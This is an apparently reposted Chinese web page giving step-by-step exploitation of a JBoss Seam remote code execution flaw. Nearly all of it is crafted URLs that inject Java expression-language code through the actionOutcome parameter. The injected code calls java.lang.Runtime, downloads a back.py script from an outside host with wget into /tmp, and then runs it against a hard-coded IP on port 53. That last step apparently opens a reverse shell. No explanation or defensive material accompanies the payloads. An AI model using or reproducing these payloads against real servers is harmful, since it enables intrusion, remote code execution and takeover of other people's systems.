jboss seam 远程执行漏洞利用步骤

来源：互联网发布：magic launcher 知乎编辑：程序博客网时间：2024/04/30 02:38

目标:http://www.ip.com
http://ip.com/welcome.seam?pwned=java.lang.UNIXProcess%4011b30c7&cid=73478
http://ip.com/home.seam?actionOutcome=/webcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6]}

http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime')}.getDeclaredMethods()[13]}

http://ip.com/home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'wget http://www.bitpress.com.cn/uploads/back.py -O

/tmp/back.py')}

home.seam?actionOutcome=/welcome.xhtml%3fpwned%3d%23{expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[13].invoke(expressions.getClass().forName

('java.lang.Runtime').getDeclaredMethods()[6].invoke(null), 'perl /tmp/back.py 118.122.176.42 53')}